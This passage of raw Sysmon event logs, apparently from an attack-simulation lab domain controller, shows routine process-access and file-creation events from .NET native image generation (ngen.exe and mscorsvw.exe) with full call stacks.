wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8704-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.772{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8704-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.772{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8704-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:29.709{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\560-0\System.Web.Extensions.Design.dll2021-01-18 13:51:29.709 10341000x80000000000000008785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.272{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.256{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.256{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8604-00000000A301}1376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.163{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8504-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.147{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8504-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.147{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8504-00000000A301}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.053{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9261-6005-8404-00000000A301}1408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:29.038{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9261-6005-8404-00000000A301}1408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:29.038{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9261-6005-8404-00000000A301}1408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:30.928{59A5CD1D-9261-6005-8804-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1088-0\System.Web.Mobile.dll2021-01-18 13:51:30.928 10341000x80000000000000008813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.928{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.912{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.912{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.475{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8D04-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.459{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8D04-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.459{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8D04-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:31.412{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\129c-0\System.Web.Routing.dll2021-01-18 13:51:31.412 10341000x80000000000000008806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.366{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.366{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.287{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8B04-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 